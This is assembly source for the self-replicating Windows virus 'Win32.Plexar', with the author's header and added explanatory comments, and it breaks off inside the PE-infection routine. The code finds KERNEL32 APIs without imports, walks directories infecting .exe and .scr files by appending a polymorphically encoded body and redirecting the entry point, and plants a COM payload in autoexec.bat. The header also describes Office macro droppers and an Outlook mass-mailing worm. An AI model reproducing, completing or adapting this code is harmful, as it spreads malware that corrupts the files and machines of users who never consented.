; ══════════════════════════════════════════════════════════════════════════
; ─< Win32.Plexar >─
; Designed by LiteSys in Venezuela, South America
;
; PE/DOC/XLS/OUTLOOK Multithreaded Polymorphic Direct Action infector.
;
; Welcome to Plexar, my latest code.
;
; It infects PE files by incrementing the last section, I don't overwrite
; .reloc section, it's preferable to leave it alone. In fact, this virus
; avoids infecting some AV or Win32 files that should never be infected.
; This is done by CRC32 comparison.
;
; Infects Word and Excel documents by dropping (thru VBScript) a macro
; module-infectant virus in the normal template and personal.xls that is
; capable of dropping an infected PE file to the Windows directory and then
; running it.
;
; Distributes through Electronic Mail by dropping a VBS worm capable of
; sending infected droppers to every email address in the Outlook address
; book. Sorry but I didn't have any time to code a decent MAPI worm =(.
;
; The Poly engine is another lame table-driven engine written by me =), no
; anti-aver intentions were the reason to write that poly engine, just to
; conceal the code a little. So I think it doesn't deserve an explanation
; because the garbage is very lame.
;
; It runs the different routines (word infection, vbs worm, direct action)
; in different threads. As I always said, I don't optimize my code too much.
;
; The payload is very funny and if you're from Venezuela I hope you
; appreciate it. Consists in dropping a simple com file that displays
; some silly stuff in spanish, it runs on autoexec.bat but won't display
; the message until the following rule is complied with (this is a very
; kewl idea I learnt from Byway ;D):
;
; If Month <= 7: Day = Month^2 / 3 + 4
; If Month >= 8: Day = Month^2 / 5 - 4
;
; So the payload will run on every month (as a coincidence, the formula
; pointed to December 24th :P). It's not destructive so don't blame me.
;
; This virus has lots of bugs, I've corrected many but still there are a
; lot. It was tested under Win95 (4.10.1111), Win98 (4.10.1998), WinME and
; WinNT (4.0/SP4), the virus worked perfectly under those versions. I don't
; know about Win98 SE and Win2K, since I don't have them installed, I have
; the CDs here but I'm a lazy ass and my HD space is totally phuken.
;
; Virus Size = 12kb. Code not commented. Not even AVP or Norton (with
; their "high heuristic" bloodhound shit) flagged the infected PE baits,
; except for Norton, which flagged the VBS worm.
;
; If you need to contact me you can use both mail addresses: litesys@monte.as
; or liteno2@softhome.net. Remember, for decent stuff.
;
; Patria o Muerte: Venceremos.
; LiteSys.
; Venezuela, Julio/Agosto - (c) 2001
; ══════════════════════════════════════════════════════════════════════════
|
||
|
||
; --- Assembler setup: TASM, 32-bit flat model, STDCALL API calls ---
.586
.MODEL FLAT, STDCALL

INCLUDE C:\TOOLS\TASM\INCLUDE\WIN32API.INC
INCLUDE C:\TOOLS\TASM\INCLUDE\WINDOWS.INC

; Imported by the link step only; the body itself resolves every API at
; run time (see Busca_K32 / Busca_GPA / Busca_APIs). Presumably used by the
; first-generation carrier, which is not in this view.
EXTRN ExitProcess:PROC
EXTRN MessageBoxExA:PROC

.DATA

; FALSE: the three routines run as threads and end with ExitThread.
; TRUE:  they are called inline and return (see the IF DEBUG blocks).
DEBUG EQU FALSE

; Delta-relative addressing helpers. EBP holds the difference between the
; address the code runs at and the address it was assembled at, so every
; data reference is written as [label + EBP].
OFS EQU <OFFSET [EBP]>
BY EQU <BYTE PTR [EBP]>
WO EQU <WORD PTR [EBP]>
DWO EQU <DWORD PTR [EBP]>
RDTSC EQU <DW 310Fh>               ; raw opcode of RDTSC (emitted as data)

; Indirect call through a delta-relative API slot that Busca_APIs fills in.
APICALL MACRO APIz
CALL DWORD PTR [APIz + EBP]
ENDM

Numero_Paginas EQU 32h             ; 64 KB steps tried by Busca_K32 (50)
K32_W9X EQU 0BFF70000h             ; fallback KERNEL32 base when the scan fails (Win9x)
GPA_W9X EQU 0BFF76DACh             ; fallback GetProcAddress when the export walk fails (Win9x)
Virus_Tama¤o EQU (Termina_Plexar - Empieza_Plexar)   ; body size; end label not in this view

; "Plexar." followed by the body size as five decimal digits, computed at
; assembly time, then a terminator.
Titulo DB "Plexar."
DB Virus_Tama¤o / 10000 MOD 10 + 30h
DB Virus_Tama¤o / 01000 MOD 10 + 30h
DB Virus_Tama¤o / 00100 MOD 10 + 30h
DB Virus_Tama¤o / 00010 MOD 10 + 30h
DB Virus_Tama¤o / 00001 MOD 10 + 30h
DB 00h

Mensaje DB "Plexar (c) 2001 LiteSys "
DB "-- Activado."
DB 00h

; Registry constants used by the SHSetValueA call in Infecta_Word.
REG_SZ EQU <1>
HKEY_LOCAL_MACHINE EQU <80000002h>

.CODE
|
||
|
||
; Entry point of the appended body. Infecta_PE redirects the victim's
; AddressOfEntryPoint here, so this runs with the stack exactly as the
; loader left it for the host's original entry point.
Empieza_Plexar:

; Delta offset: EBP = (runtime address of @Delta) - (assembled address of
; @Delta). OFS/BY/WO/DWO and APICALL depend on it.
CALL @Delta
@Delta:
POP EAX
XCHG EBP, EAX
SUB EBP, OFFSET @Delta

JMP @@1
DB 00h, 00h, "[PLEXAR]", 00h, 00h    ; inline text marker, jumped over
@@1:

; SEH frame. The return address pushed by this CALL (the two instructions
; right below) is registered as the exception handler: on any fault it
; restores ESP from the EXCEPTION_REGISTRATION pointer at [ESP+8] and goes
; to @FueraHost, so the host still gets control.
CALL @SEH_1

MOV ESP, DWORD PTR [ESP+8h]
JMP @FueraHost

@SEH_1:

XOR EAX, EAX
PUSH DWORD PTR FS:[EAX]             ; previous registration
MOV FS:[EAX], ESP                   ; FS:[0] -> {prev, handler}

; [ESP+8] is the return address the loader pushed for the host entry point,
; i.e. an address inside KERNEL32 on the Win9x/NT4 targets named in the
; header; it seeds the KERNEL32 base scan.
MOV EDI, DWORD PTR [ESP+8h]
CALL Busca_K32
CALL Busca_GPA

; Resolve the KERNEL32 imports: ESI = first output slot (CreateFileA is the
; slot label, not the API), EDI = packed name list, EBX = module base.
LEA ESI, OFS [CreateFileA]
LEA EDI, OFS [APIs_K32]
MOV EBX, DWO [KERNEL32]
CALL Busca_APIs

; Remember the directory the host was started in (Directa restores it).
LEA EDX, OFS [RewtDir]
PUSH EDX
PUSH MAX_PATH
APICALL GetCurrentDirectoryA
OR EAX, EAX
JZ @FueraHost

IF DEBUG

; Debug build: run the three routines inline, on this thread.
PUSH EBP
CALL Directa

PUSH EBP
CALL Worm_VBS

PUSH EBP
CALL Infecta_Word

JMP @FueraHost

ELSE

; Release build: spawn them as threads and wait for them (see Thread).
CALL Thread

ENDIF

CALL Er_Pailon                      ; payload dropper

@FueraHost:

; Unlink the SEH frame and return to the host's original entry point.
XOR ECX, ECX
POP DWORD PTR FS:[ECX]
POP ECX                             ; discard the handler address

; PUSH imm32 whose immediate is patched in place: HostBack holds the host's
; original entry address (Infecta_PE stores it into each copy before it is
; written out; Mentira is the first-generation target, not in this view).
; RET then jumps there.
PUSH 12345678h
ORG $-4
HostBack DD OFFSET Mentira
RET
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
; El Thread Principal, carga los otros threads.
|
||
|
||
; Main thread: starts the three worker threads, passing the delta (EBP) as
; the thread parameter. Directa runs alone first and is awaited; Worm_VBS
; and Infecta_Word then run concurrently and are both awaited.
; Clobbers: nothing (PUSHAD/POPAD). Writes Listo_Directa and the three
; Thread_* dwords (thread id first, then overwritten with the handle).
Thread PROC
PUSHAD

AND BY [Listo_Directa], 00h         ; Directa sets this to 1 when it finishes

; CreateThread(NULL, 0, Directa, EBP, 0, &Thread_Directa)
XOR EAX, EAX
LEA EBX, OFS [Thread_Directa]
PUSH EBX
PUSH EAX
PUSH EBP
LEA EBX, OFS [Directa]
PUSH EBX
PUSH EAX
PUSH EAX
APICALL CreateThread
MOV DWO [Thread_Directa], EAX
OR EAX, EAX
JZ @FinThread

PUSH 02h                            ; THREAD_PRIORITY_HIGHEST
PUSH EAX
APICALL SetThreadPriority

; Wait (INFINITE) for Directa's thread and re-check its done flag
@RevDirect:
PUSH -1
PUSH DWO [Thread_Directa]
APICALL WaitForSingleObject

CMP BY [Listo_Directa], 01h
JNZ @RevDirect

; CreateThread(NULL, 0, Worm_VBS, EBP, 0, &Thread_WormVBS)
XOR EAX, EAX
LEA EBX, OFS [Thread_WormVBS]
PUSH EBX
PUSH EAX
PUSH EBP
LEA EBX, OFS [Worm_VBS]
PUSH EBX
PUSH EAX
PUSH EAX
APICALL CreateThread
MOV DWO [Thread_WormVBS], EAX
OR EAX, EAX
JZ @FinThread

PUSH 02h                            ; THREAD_PRIORITY_HIGHEST
PUSH EAX
APICALL SetThreadPriority

; CreateThread(NULL, 0, Infecta_Word, EBP, 0, &Thread_IWord)
XOR EAX, EAX
LEA EBX, OFS [Thread_IWord]
PUSH EBX
PUSH EAX
PUSH EBP
LEA EBX, OFS [Infecta_Word]
PUSH EBX
PUSH EAX
PUSH EAX
APICALL CreateThread
MOV DWO [Thread_IWord], EAX
OR EAX, EAX
JZ @FinThread

PUSH 02h                            ; THREAD_PRIORITY_HIGHEST
PUSH EAX
APICALL SetThreadPriority

; WaitForMultipleObjects(2, &Thread_WormVBS, TRUE, INFINITE)
; NOTE(review): relies on Thread_WormVBS and Thread_IWord being adjacent
; dwords in the data area (not in this view) — confirm.
PUSH -1
PUSH TRUE
LEA EAX, OFS [Thread_WormVBS]
PUSH EAX
PUSH 02h
APICALL WaitForMultipleObjects

@FinThread:

POPAD
RET

Thread ENDP
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
; Payload.
|
||
|
||
; Payload. Writes Payload_Prog (a COM program, Largo_PProg bytes) to the
; file named by CocoFrio, then appends that file name to the file named by
; AutoExec so it runs at the next boot of a DOS-based Windows. Nothing in
; this routine checks the date rule described in the header; presumably
; the COM program does that itself.
; Clobbers: nothing (PUSHAD/POPAD). Writes PFHandle, PTemporal.
Er_Pailon PROC
PUSHAD

; CreateFileA(CocoFrio, GENERIC_WRITE, 0, NULL, CREATE_NEW, NORMAL, NULL)
; CREATE_NEW fails if the file already exists, so this is a one-time drop.
CDQ                                 ; cheap EDX = 0 (valid while EAX is non-negative)
PUSH EDX
PUSH FILE_ATTRIBUTE_NORMAL
PUSH CREATE_NEW
PUSH EDX
PUSH EDX
PUSH GENERIC_WRITE
LEA EAX, OFS [CocoFrio]
PUSH EAX
APICALL CreateFileA
MOV DWO [PFHandle], EAX
INC EAX
JZ @P_Fin                           ; INVALID_HANDLE_VALUE
DEC EAX
XCHG EBX, EAX

; WriteFile(h, Payload_Prog, Largo_PProg, &PTemporal, NULL)
XOR EDX, EDX
PUSH EDX
LEA EAX, OFS [PTemporal]
PUSH EAX
PUSH Largo_PProg
LEA EAX, OFS [Payload_Prog]
PUSH EAX
PUSH EBX
APICALL WriteFile
OR EAX, EAX
JZ @P_Fin

PUSH DWO [PFHandle]
APICALL CloseHandle

; CreateFileA(AutoExec, GENERIC_WRITE, 0, NULL, OPEN_EXISTING, NORMAL, NULL)
CDQ
PUSH EDX
PUSH FILE_ATTRIBUTE_NORMAL
PUSH OPEN_EXISTING
PUSH EDX
PUSH EDX
PUSH GENERIC_WRITE
LEA EAX, OFS [AutoExec]
PUSH EAX
APICALL CreateFileA
MOV DWO [PFHandle], EAX
INC EAX
JZ @P_Fin
DEC EAX

; SetFilePointer(h, 0, NULL, FILE_END) — append
CDQ
PUSH 00000002h
PUSH EDX
PUSH EDX
PUSH EAX
APICALL SetFilePointer

; WriteFile(h, CocoFrio, Largo_CocoFrio-1, &PTemporal, NULL): the file name
; string itself becomes a line of the batch file (length minus one — the
; terminator is presumably what is left out).
CDQ
PUSH EDX
LEA EAX, OFS [PTemporal]
PUSH EAX
PUSH Largo_CocoFrio-1
LEA EAX, OFS [CocoFrio]
PUSH EAX
PUSH DWO [PFHandle]
APICALL WriteFile
OR EAX, EAX
JZ @P_Fin

PUSH DWO [PFHandle]
APICALL CloseHandle

@P_Fin:

POPAD
RET
Er_Pailon ENDP
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
; Proceso para buscar la base de KERNEL32
|
||
|
||
; Locate the KERNEL32 image base by scanning 64 KB boundaries downward from
; an address known to lie inside it.
; In:  EDI = address inside KERNEL32 (the loader's return address, see
;      Empieza_Plexar)
; Out: DWO [KERNEL32] = image base, or K32_W9X if no MZ/PE pair was found
;      within Numero_Paginas steps
; Clobbers: EDI, ECX, BX, flags
; A fault on an unmapped page is caught by the SEH frame installed at entry,
; which abandons the whole body.
Busca_K32 PROC

AND EDI, 0FFFF0000h                 ; round down to a 64 KB boundary
PUSH Numero_Paginas
POP ECX                             ; number of steps to try

@Compara_K32:

PUSH EDI                            ; candidate base; popped at @EnK32 on a hit

; "MZ" test written as OR/SUB rather than CMP
MOV BX, WORD PTR [EDI]
OR BX, 03D5Bh ; 5A4D || 3D5B == 7F5F
SUB BX, 07F5Fh
JNZ @Incrementa_K32

ADD EDI, [EDI+3Ch]                  ; base + e_lfanew -> IMAGE_NT_HEADERS
MOV BX, WORD PTR [EDI] ; 4550 && C443 == 4440
AND BX, 0C443h
XOR BX, 04440h
JE @EnK32                           ; "PE" found; candidate still on the stack

@Incrementa_K32:

POP EDI

SUB EDI, 10000h                     ; previous 64 KB page
LOOP @Compara_K32

PUSH K32_W9X                        ; scan exhausted: hardcoded Win9x base

@EnK32:

POP DWO [KERNEL32]
RET

Busca_K32 ENDP
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
DB 5 DUP (90h)                      ; five NOP bytes of padding between procedures
|
||
|
||
; Proceso para buscar a GetProcAddress
|
||
|
||
; Find GetProcAddress in KERNEL32's export table by comparing a CRC32 of
; each exported name (no plain-text API name in the body).
; In:  DWO [KERNEL32] = image base
; Out: DWO [GetProcAddress] = resolved address, or GPA_W9X if not found;
;      DWO [Exports] = export directory address
; Clobbers: EAX, EBX, ECX, ESI, EDI, flags
; CRC32 convention, as used at every call site in this file: ESI = buffer,
; EDI = length, result in EAX.
Busca_GPA PROC

MOV EBX, DWO [KERNEL32]
MOV EDI, EBX

ADD EDI, DWORD PTR [EDI+3Ch]        ; IMAGE_NT_HEADERS
MOV EDI, DWORD PTR [EDI+78h]        ; DataDirectory[EXPORT].VirtualAddress
ADD EDI, EBX
MOV DWO [Exports], EDI

MOV ECX, DWORD PTR [EDI+18h]        ; NumberOfNames
DEC ECX                             ; LOOP counter

MOV EDI, DWORD PTR [EDI+20h]        ; AddressOfNames
ADD EDI, EBX

XOR EAX, EAX                        ; EAX = current name index

@BGPA_1:

MOV ESI, DWORD PTR [EDI]            ; RVA of this name
ADD ESI, EBX
PUSH EDI

PUSH l_GetProcAddress               ; EDI = length of "GetProcAddress"
POP EDI
PUSHAD
CALL CRC32
CMP EAX, CRC32_GetProcAddress
POPAD                               ; flags survive POPAD
POP EDI
JE @BGPA_2

INC EAX
ADD EDI, 4h

LOOP @BGPA_1

PUSH GPA_W9X                        ; not found: hardcoded Win9x address

JMP @BGPA_3

@BGPA_2:

MOV ESI, DWO [Exports]
ADD EAX, EAX                        ; index * sizeof(WORD)

MOV EDI, DWORD PTR [ESI+24h]        ; AddressOfNameOrdinals
ADD EDI, EBX
ADD EDI, EAX

MOVZX EAX, WORD PTR [EDI]           ; index into AddressOfFunctions
IMUL EAX, 4h

MOV EDI, DWORD PTR [ESI+1Ch]        ; AddressOfFunctions
ADD EDI, EBX
ADD EDI, EAX

MOV EAX, DWORD PTR [EDI]            ; function RVA
ADD EAX, EBX

PUSH EAX

@BGPA_3:

POP DWO [GetProcAddress]

RET

Busca_GPA ENDP
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
; ESI -> Donde Guardar las APIs
|
||
; EDI -> Cadenas de APIs
|
||
; EBX -> Modulo
|
||
|
||
; Proceso para buscar las APIs
|
||
|
||
; Resolve a list of API names with GetProcAddress and store the addresses
; in consecutive dword slots.
; In:  ESI = first output slot
;      EDI = packed name list. Each name is a byte string ended by 00h; a
;            byte in 01h..0Eh is a token standing for one 00h-separated
;            fragment of PackedAPIs (fragment number = token value, the
;            first fragment counting as 0), any byte above 0Eh is a literal
;            character. 0FFh ends the list.
;      EBX = module base passed to GetProcAddress
; Out: one resolved address per name at ESI, ESI+4, ...
; Clobbers: nothing (PUSHAD/POPAD); patches the Guardalo immediate in place.
Busca_APIs PROC

PUSHAD

MOV DWO [Guardalo], ESI             ; output cursor, kept inside the MOV ESI,imm32 below
XCHG EDI, ESI                       ; ESI = name list

@BA1:
LEA EDI, OFS [TempAPI]              ; rebuild the plain-text name here
@BA2:

CMP BYTE PTR [ESI], 00h
JE @BA4                             ; end of this name

LODSB
CMP AL, 0Eh
JA @BA3                             ; literal character

; Token: locate fragment number AL in PackedAPIs
XOR ECX, ECX
XCHG CL, AL

PUSH ESI
LEA ESI, OFS [PackedAPIs]

@BA5:
INC ESI
CMP BYTE PTR [ESI], 00h
JNZ @BA5                            ; to the end of the current fragment

LOOP @BA5                           ; ... repeated AL times

INC ESI                             ; first byte of the selected fragment
@BA6:
MOVSB
CMP BYTE PTR [ESI], 00h
JNZ @BA6                            ; copy it up to (not including) its 00h

POP ESI
JMP @BA2

@BA3:
STOSB
JMP @BA2

@BA4:

XOR AL, AL
STOSB                               ; terminate the rebuilt name

; GetProcAddress(module, TempAPI)
LEA EAX, OFS [TempAPI]
PUSH EAX
PUSH EBX
CALL [GetProcAddress+EBP]
NOP

; Store the result through the self-patched pointer, then advance it
PUSH ESI
MOV ESI, 12345678h
ORG $-4
Guardalo DD 00000000h
MOV DWORD PTR [ESI], EAX
ADD DWO [Guardalo], 00000004h
POP ESI

INC ESI                             ; skip the name's 00h

CMP BYTE PTR [ESI], 0FFh
JNZ @BA1                            ; more names follow

@OA7:

POPAD

RET

Busca_APIs ENDP
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
; Accion directa.
|
||
|
||
; Direct-action thread. Starting in the directory saved at entry (RewtDir),
; enumerates every file matching Mascara, hands those whose lower-cased
; 4-character extension hashes to .exe or .scr to Infecta_PE, then changes
; to the directory named by Puto_Puto and repeats until the current
; directory's path length stops changing.
; In:  DeltaOfs (Pascal argument = the CreateThread parameter) = delta for EBP
; Out: none. Release build sets Listo_Directa and ends with ExitThread.
; Writes BHandle, Busqueda, LargPP; patches the GuardaEBP immediate.
Directa PROC Pascal DeltaOfs:DWORD

PUSHAD

MOV EBP, DeltaOfs                   ; EBP: frame pointer -> delta offset

; SEH frame: on a fault ESP is restored and control goes to @DIRF
CALL @SEH_2

MOV ESP, DWORD PTR [ESP+8h]
JMP @DIRF

@SEH_2:

XOR EAX, EAX
PUSH DWORD PTR FS:[EAX]
MOV FS:[EAX], ESP

LEA EDX, OFS [RewtDir]
PUSH EDX
APICALL SetCurrentDirectoryA
OR EAX, EAX
JZ @DIRF

@DIR1:

; FindFirstFileA(Mascara, &Busqueda)
LEA EAX, OFS [Busqueda]
PUSH EAX
LEA EAX, OFS [Mascara]
PUSH EAX
APICALL FindFirstFileA
MOV DWO [BHandle], EAX
INC EAX
JZ @DIR2                            ; INVALID_HANDLE_VALUE: nothing here

@DIR3:

; Walk cFileName to its 00h; ESI = last four characters + terminator
LEA EDI, OFS [Busqueda.wfd_szFileName]
MOV EBX, EDI
PUSH EBX
XOR AL, AL
SCASB
JNZ $-1                             ; re-execute SCASB until the 00h
XCHG ESI, EDI
SUB ESI, 5h
OR DWORD PTR [ESI], 20202020h       ; lower-case the extension in place
MOV EDI, 5h                         ; CRC32 over ".ext" + 00h
CALL CRC32
POP EBX                             ; EBX = file name (for Infecta_PE)
CMP EAX, CRC_EXE ; .exe crc32
JE @Infecta_Este_Exe
CMP EAX, CRC_SCR ; .scr crc32
JE @Infecta_Este_Exe

@Retorna_Directa:

; FindNextFileA(BHandle, &Busqueda)
LEA EAX, OFS [Busqueda]
PUSH EAX
PUSH DWO [BHandle]
APICALL FindNextFileA
OR EAX, EAX
JNZ @DIR3

PUSH DWO [BHandle]
APICALL FindClose

@DIR2:

; Move to the directory named by Puto_Puto (string not in this view) and
; compare the resulting path length with the previous one; an unchanged
; length means the walk cannot go any further.
LEA EAX, OFS [Puto_Puto]
PUSH EAX
APICALL SetCurrentDirectoryA

LEA EAX, OFS [Busqueda.wfd_szFileName]
PUSH EAX
PUSH MAX_PATH
APICALL GetCurrentDirectoryA
CMP EAX, DWO [LargPP]
JZ @DIRF
MOV DWO [LargPP], EAX
JMP @DIR1

; Not reached: nothing jumps here and the JMP above never falls through.
LEA EAX, OFS [RewtDir]
PUSH EAX
APICALL SetCurrentDirectoryA

@DIRF:

; Unlink the SEH frame
XOR ECX, ECX
POP DWORD PTR FS:[ECX]
POP ECX

IF DEBUG

POPAD
RET

ELSE

INC BY [Listo_Directa]              ; signal Thread that this pass is done

; The delta is needed after POPAD to reach the ExitThread slot, so it is
; parked in the immediate of the MOV EBX below.
MOV DWO [GuardaEBP], EBP
POPAD

MOV EBX, 12345678h
ORG $-4
GuardaEBP DD 00000000h

PUSH NULL
CALL [EBX+ExitThread]               ; ExitThread(0) — does not return

RET

ENDIF

@Infecta_Este_Exe:
CALL Infecta_PE                     ; EBX = file name
JMP @Retorna_Directa

Directa ENDP
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
; Proceso para infectar un PE.
|
||
;
|
||
; EBX -> Archivo a infectar
|
||
|
||
; Infect one PE file by appending a polymorphically encoded copy of the body
; to its last section and pointing the entry point at it.
; In:  EBX = file name (relative to the current directory)
; Out: none. During the copy, HostBack in the running image is set to the
;      victim's original entry point (so the appended copy returns to it) and
;      restored from Guarda_EIP afterwards.
; Skipped files: name whose first-4-byte CRC32 appears in CRCNoInf (25
; entries), size below 8192 bytes, missing MZ/PE signatures, e_lfanew
; outside the file, or the 5-byte marker at PE+4Ch already present.
; File-system footprint: the file is grown by Virus_Tama¤o + 1400h for the
; mapping and cut back to its original size when infection is abandoned.
; Clobbers: nothing (PUSHAD/POPAD). Writes Guarda_EIP, FHandle, MHandle,
; BaseMap, Tama¤o_1, Tama¤o_2, HostBack.
Infecta_PE PROC

PUSHAD

PUSH DWO [HostBack]                 ; keep this instance's own return-to-host address
POP DWO [Guarda_EIP]

; SEH frame: a fault on a malformed header lands at @PEF
CALL @Seh_IPE

MOV ESP, [ESP+8h]
JMP @PEF

@Seh_IPE:

XOR EAX, EAX
PUSH DWORD PTR FS:[EAX]
MOV FS:[EAX], ESP

; Exclusion list: CRC32 of the first 4 name bytes against each CRCNoInf entry
PUSH 019d
POP ECX                             ; 25 entries

MOV ESI, EBX
LEA EDX, OFS [CRCNoInf]

@CicloNo:

PUSH 04h
POP EDI                             ; CRC length = 4
PUSH EBX
PUSH ESI
PUSH EDX
PUSH ECX
CALL CRC32
POP ECX
POP EDX
POP ESI
POP EBX
CMP EAX, DWORD PTR [EDX]
JZ @PEF                             ; excluded name: leave it alone
ADD EDX, 4h
LOOP @CicloNo

; SetFileAttributesA(name, 0) — drop read-only/hidden/system before opening
PUSH 00000000h
PUSH EBX
APICALL SetFileAttributesA

; CreateFileA(name, READ|WRITE, 0, NULL, OPEN_EXISTING, 0, NULL)
XOR EAX, EAX
PUSH EAX
PUSH 00000000h
PUSH OPEN_EXISTING
PUSH EAX
PUSH EAX
PUSH GENERIC_READ + GENERIC_WRITE
PUSH EBX
APICALL CreateFileA
MOV DWO [FHandle], EAX
INC EAX
JZ @PEF

DEC EAX
PUSH NULL
PUSH EAX
APICALL GetFileSize
MOV DWO [Tama¤o_1], EAX             ; original size
INC EAX
JZ @PE_Close                        ; INVALID_FILE_SIZE
DEC EAX

CMP EAX, 8192d
JB @PE_Close                        ; too small

; Mapping size = original + body + 1400h slack; Tama¤o_1 is only updated to
; this once the copy has actually been written.
ADD EAX, Virus_Tama¤o + 1400h
MOV DWO [Tama¤o_2], EAX

; CreateFileMappingA(FHandle, NULL, PAGE_READWRITE, 0, Tama¤o_2, NULL)
XOR EDX, EDX
PUSH EDX
PUSH EAX
PUSH EDX
PUSH PAGE_READWRITE
PUSH EDX
PUSH DWO [FHandle]
APICALL CreateFileMappingA
MOV DWO [MHandle], EAX
OR EAX, EAX
JZ @PE_Close

; MapViewOfFile(MHandle, FILE_MAP_WRITE, 0, 0, Tama¤o_2)
XOR EDX, EDX
PUSH DWO [Tama¤o_2]
PUSH EDX
PUSH EDX
PUSH FILE_MAP_WRITE
PUSH EAX
APICALL MapViewOfFile
MOV DWO [BaseMap], EAX
OR EAX, EAX
JZ @PE_CloseMap

; "MZ" test, obfuscated: (5A4Dh AND 3ED4h) * 2 == 3488h
MOV EDI, EAX
MOV BX, WORD PTR [EDI]
AND BX, 3ED4h ; "ZM" = 5A4Dh ^ 3ED4h == 1444h
ADD BX, BX
XOR BX, 3488h
JNZ @PE_UnMap

; e_lfanew must land inside the mapped original file
MOV EBX, DWORD PTR [EDI+3Ch]
ADD EBX, EDI
CMP EBX, DWO [BaseMap]
JB @PE_UnMap
MOV EDX, DWO [BaseMap]
ADD EDX, DWO [Tama¤o_1]
CMP EBX, EDX
JA @Pe_UnMap

; "PE" test, obfuscated: 4550h OR 0AEDAh == 0EFDAh
ADD EDI, [EDI+3Ch]                  ; EDI = IMAGE_NT_HEADERS
MOV BX, WORD PTR [EDI]
OR BX, 0AEDAh ; "EP" = 4550h | 0AEDAh == 0EFDAh
SUB BX, 0EFDAh
JNZ @PE_UnMap

; Already-infected test: CRC32 of the 5 bytes at PE+4Ch (the reserved
; OptionalHeader.Win32VersionValue plus one byte) against CRC_PLXR
MOV ESI, EDI
PUSHAD
ADD ESI, 4Ch
MOV EDI, 5h
CALL CRC32
CMP EAX, CRC_PLXR
POPAD
JE @PE_UnMap

; Write the marker there (the constant is XOR-masked at assembly time so the
; plain dword does not appear in the body)
MOV EAX, "rxlp" XOR 0C3E8F2A8h
XOR EAX, 0C3E8F2A8h
MOV DWORD PTR [EDI+4Ch], EAX

; ESI = last section header:
;   PE + 18h + SizeOfOptionalHeader + (NumberOfSections - 1) * 28h
ADD ESI, 18h
MOVZX EAX, WORD PTR [EDI+14h]
ADD ESI, EAX

XOR EDX, EDX
MOVZX EDX, WORD PTR [EDI+06h]
DEC EDX
IMUL EDX, 28h
ADD ESI, EDX

; Characteristics |= MEM_EXECUTE | MEM_WRITE | CNT_CODE (a section that is
; both writable and executable is itself a static tell)
OR DWORD PTR [ESI+24h], 0A0000020h

; VirtualSize += body + 400h; the old value stays on the stack
MOV EAX, DWORD PTR [ESI+08h]
PUSH EAX
ADD EAX, Virus_Tama¤o + 400h
MOV DWORD PTR [ESI+08h], EAX

; SizeOfRawData = new VirtualSize rounded up to the next FileAlignment multiple
MOV EBX, DWORD PTR [EDI+3Ch]        ; OptionalHeader.FileAlignment
XOR EDX, EDX
DIV EBX
INC EAX
MUL EBX

MOV DWORD PTR [ESI+10h], EAX

; SizeOfImage = section VirtualAddress + SizeOfRawData
MOV EAX, DWORD PTR [ESI+10h]
ADD EAX, DWORD PTR [ESI+0Ch]
MOV DWORD PTR [EDI+50h], EAX

POP EDX                             ; EDX = old VirtualSize

; Victim's original entry point as a VA, stored into the copy about to be written
MOV EAX, DWORD PTR [EDI+28h]        ; AddressOfEntryPoint
ADD EAX, DWORD PTR [EDI+34h]        ; + ImageBase
MOV DWO [HostBack], EAX

; New entry point RVA = section VirtualAddress + old VirtualSize
ADD EDX, DWORD PTR [ESI+0Ch]
MOV DWORD PTR [EDI+28h], EDX

; The next eight one-byte instructions encode as the text "USD[LSX]", a
; signature string that is also executable. Net effect: EBP preserved,
; EAX and EBX clobbered (neither is read again before POPAD / reload).
PUSH EBP
PUSH EBX
INC ESP

POP EBX ; \
DEC ESP ; \
PUSH EBX ; > "[LSX]" executable string.
POP EAX ; /
POP EBP ; /

; EDI = file offset for the body:
;   PointerToRawData + new VirtualSize - (body + 400h) = PointerToRawData + old VirtualSize
MOV EDI, DWORD PTR [ESI+14h]
ADD EDI, DWORD PTR [ESI+08h]
ADD EDI, DWO [BaseMap]
MOV ECX, Virus_Tama¤o / 4           ; length in dwords for the poly engine
SUB EDI, Virus_Tama¤o + 400h
LEA ESI, OFS [Empieza_Plexar]
CALL PXPE                           ; emit decryptor + encoded body at EDI

; Keep the grown file size
PUSH DWO [Tama¤o_2]
POP DWO [Tama¤o_1]

@PE_UnMap:

